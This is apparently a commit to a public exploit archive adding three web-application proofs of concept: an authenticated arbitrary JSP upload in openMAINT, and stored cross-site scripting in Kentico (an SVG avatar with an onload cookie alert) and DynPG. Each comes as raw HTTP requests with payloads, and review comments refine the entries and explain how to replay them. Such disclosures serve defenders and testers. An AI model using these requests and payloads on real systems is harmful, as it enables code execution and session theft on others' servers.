DB: 2020-10-10
3 changes to exploits/shellcodes

Kentico CMS 9.0-12.0.49 - Persistent Cross Site Scripting
DynPG 4.9.1 - Persistent Cross-Site Scripting (Authenticated)
openMAINT 1.1-2.4.2 - Arbitrary File Upload
parent
b45931e440
commit
0aa8d538e2
4 changed files with 168 additions and 0 deletions
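--- /dev/null
+++ b/exploits/json/webapps/48866.txt
@@ -0,0 +1,78 @@
+# Exploit Title: openMAINT 1.1-2.4.2 - Arbitrary File Upload
+# Dork: N/A
+# Date: 2020-08-19
+# Exploit Author: mrb3n
+# Vendor Homepage: https://www.openmaint.org/en
+# Software Link: https://sourceforge.net/projects/openmaint/files/1.1/openmaint-1.1-2.4.2.zip/download
+# Version: 1.1-2.4.2
+# Category: Webapps
+# Tested on: Ubuntu 16.04
+# CVE: N/A
+
+
+# POC: http://localhost:8080/openmaint/administration.jsp
+#
+POST /openmaint/services/json/file/upload?CMDBuild-Authorization=fnlt93ijq0dru5qtenme73d4lf HTTP/1.1
+
+Host: 192.168.1.1:8080
+
+User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
+
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+
+Accept-Language: en-US,en;q=0.5
+
+Accept-Encoding: gzip, deflate
+
+Content-Type: multipart/form-data; boundary=---------------------------12239060382062588071523757460
+
+Content-Length: 1369
+
+Origin: http://192.168.1.1:8080
+
+DNT: 1
+
+Connection: close
+
+Referer: http://192.168.1.1:8080/openmaint/administration.jsp
+
+Cookie: JSESSIONID=5BAAEBDCC2151BD59ED2CD6FD3CA8165; CMDBuild-Authorization=fnlt93ijq0dru5qtenme73d4lf
+
+Upgrade-Insecure-Requests: 1
+
+
+
+-----------------------------12239060382062588071523757460
+
+Content-Disposition: form-data; name="fileStore"
+
+
+
+images
+
+-----------------------------12239060382062588071523757460
+
+Content-Disposition: form-data; name="folder"
+
+
+
+d41d8cd98f00b204e9800998ecf8427e
+
+-----------------------------12239060382062588071523757460
+
+Content-Disposition: form-data; name="file"; filename="malicious.jsp"
+
+Content-Type: application/octet-stream
+
+
+
+[Malicious code here]
+
+
+-----------------------------12239060382062588071523757460--
+
+
+# The malicious file will be uploaded directly to the /upload/images directory with the file name unchanged, example:
+http://192.168.1.1:8080/openmaint/upload/images/malicious.jsp
+# How to fix: Update to the latest version
+# Earlier versions as well as other 1.1-x versions are likely vulnerable.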
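Review bot: The request is authenticated — the session token appears both as the query-string `CMDBuild-Authorization=...` and in `Cookie: JSESSIONID=...; CMDBuild-Authorization=...`, and the Referer is administration.jsp — yet unlike entry 48865 the title omits "(Authenticated)" and no header states which role is required. The impact is also understated: the file is stored with its name and `.jsp` extension unchanged under the served `/openmaint/upload/images/` path, so a JSP body is server-side executable code, i.e. remote code execution as the servlet-container user rather than a plain file write; suggest `# Exploit Title: openMAINT 1.1-2.4.2 - Authenticated Arbitrary File Upload / Remote Code Execution` and a `# Privileges required:` line. `# How to fix: Update to the latest version` should name the first release that restricts upload extensions, if one is known, otherwise say the fix status is unconfirmed. Anyone replaying the request must recompute `Content-Length: 1369` after replacing the `[Malicious code here]` placeholder. The target is a JSP application, so filing it under exploits/json/ (platform `json`) looks like a mis-tag for `jsp`/`java` — confirm against the index's platform list.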
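--- /dev/null
+++ b/exploits/php/webapps/48864.txt
@@ -0,0 +1,34 @@
+# Exploit Title: Kentico CMS 9.0-12.0.49 - Persistent Cross Site Scripting
+# Exploit Author: Ataberk YAVUZER
+# CVE: CVE-2019-19493
+# Type: Webapps
+# Vendor Homepage: https://www.kentico.com/
+# Version: 9.0-12.0.49
+# Date: 29-11-2019
+
+#CVE Details: https://nvd.nist.gov/vuln/detail/CVE-2019-19493
+
+Details
+
+Persistent Cross Site Scripting vulnerability has been found on the
+Admin/User Panel. Kentico before 12.0.50 allows file uploads in which the
+Content-Type header is inconsistent with the file extension, leading to XSS.
+
+# Steps to reproduce
+
+1. Log in to Kentico Admin Panel with your credentials.
+2. Browse to Profile Page.
+3. Click to "Browse" button on Avatar section.
+4. Select "avatar.svg" file which can be found on below.
+5. Intercept the request before clicking to save button.
+6. Change file name to "avatar.svg.png" and send the request. (MimeType
+needs to be "image/xml+svg")
+7. Kentico will generate an avatar link: "
+http://example.kentico.com/admin/CMSPages/GetAvatar.aspx?avatarguid=<generated_avatar_uid>"
+Send that link to another user.
+8. An alert with cookie values will pop up.
+
+
+#Content of the avatar.svg:
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.cookie)"/>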
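Review bot: Step 6 tells the tester to set the MIME type to `image/xml+svg`, but the registered SVG media type is `image/svg+xml`; someone following the text verbatim may send a type the server does not recognise as SVG, so the step should read `(MimeType needs to be "image/svg+xml")`. The description "Content-Type header is inconsistent with the file extension" does not say why that yields script execution; from steps 7–8 it appears `GetAvatar.aspx` serves the stored SVG inline under the site's own origin, which is the real root cause and deserves one sentence (hedged as observed behaviour if the author cannot confirm the server logic). `# Date: 29-11-2019` differs from the 2020-10-09 date recorded for this entry in the index — if it is the original disclosure date, label it `# Disclosure Date:`. The endpoints are `.aspx` (ASP.NET) while the file sits under exploits/php/, so the platform tag looks wrong — confirm against the index's platform list.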
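--- /dev/null
+++ b/exploits/php/webapps/48865.txt
@@ -0,0 +1,53 @@
+# Exploit Title: DynPG 4.9.1 - Persistent Cross-Site Scripting (Authenticated)
+# Date: 2020-10-09
+# Exploit Author: Enes Özeser
+# Vendor Homepage: https://dynpg.org/
+# Version: 4.9.1
+# Tested on: Windows & XAMPP
+
+==> Tutorial <==
+
+1- Login to admin panel.
+2- Click on the "Texts" button.
+3- Write XSS payload into the Groupname.
+4- Press "Create" button.
+
+XSS Payload ==> <script>alert("XSS");</script>
+
+==> HTTP Request <==
+
+POST /index.php?show=4 HTTP/1.1
+Host: (HOST)
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------342819783638885794661955465553
+Content-Length: 725
+Origin: http://(HOST)
+Connection: close
+Referer: http://(HOST)/index.php?show=4
+Cookie: PHPSESSID=bsbas234jfvvdasdasd1i
+Upgrade-Insecure-Requests: 1
+
+-----------------------------342819783638885794661955465553
+Content-Disposition: form-data; name="NEW_GROUP_NAME"
+
+<script>alert("XSS");</script>
+-----------------------------342819783638885794661955465553
+Content-Disposition: form-data; name="GROUP_ID"
+
+0
+-----------------------------342819783638885794661955465553
+Content-Disposition: form-data; name="GRP_SUBMIT"
+
+Create
+-----------------------------342819783638885794661955465553
+Content-Disposition: form-data; name="GRP_ACTION"
+
+new_grp
+-----------------------------342819783638885794661955465553
+Content-Disposition: form-data; name="dpg_csrf_token"
+
+3F16478C29BED20AA73F1D25CB23F471
+-----------------------------342819783638885794661955465553--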
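Review bot: The tutorial stops at pressing "Create" and never states where the stored `NEW_GROUP_NAME` payload is later rendered or who views it, so the impact of an injection that only an authenticated admin can perform (the request carries an admin `PHPSESSID` and a `dpg_csrf_token`) is unclear — if only the admin's own "Texts" page reflects it, this is effectively self-XSS. Add a step such as `5- The payload executes whenever the group list under "Texts" is loaded` (or wherever it was actually observed) and an `# Impact:` line naming the affected viewers. For consistency with the other two entries in this commit, add `# CVE: N/A` and a `# Software Link:` header. Anyone replaying the request must recompute `Content-Length: 725` after substituting the `(HOST)` placeholders and supply their own `dpg_csrf_token` value, which is presumably tied to the session.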
@ -40682,6 +40682,9 @@ id,file,description,date,author,type,platform,port
48861,exploits/php/webapps/48861.txt,"Textpattern CMS 4.6.2 - 'body' Persistent Cross-Site Scripting",2020-10-07,"Alperen Ergel",webapps,php,
48862,exploits/php/webapps/48862.py,"SEO Panel 4.6.0 - Remote Code Execution",2020-10-08,"Kiko Andreu",webapps,php,
48863,exploits/hardware/webapps/48863.txt,"D-Link DSR-250N 3.12 - Denial of Service (PoC)",2020-10-08,"RedTeam Pentesting GmbH",webapps,hardware,
48864,exploits/php/webapps/48864.txt,"Kentico CMS 9.0-12.0.49 - Persistent Cross Site Scripting",2020-10-09,"Ataberk YAVUZER",webapps,php,
48865,exploits/php/webapps/48865.txt,"DynPG 4.9.1 - Persistent Cross-Site Scripting (Authenticated)",2020-10-09,"Enes Özeser",webapps,php,
48866,exploits/json/webapps/48866.txt,"openMAINT 1.1-2.4.2 - Arbitrary File Upload",2020-10-09,mrb3n,webapps,json,
42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,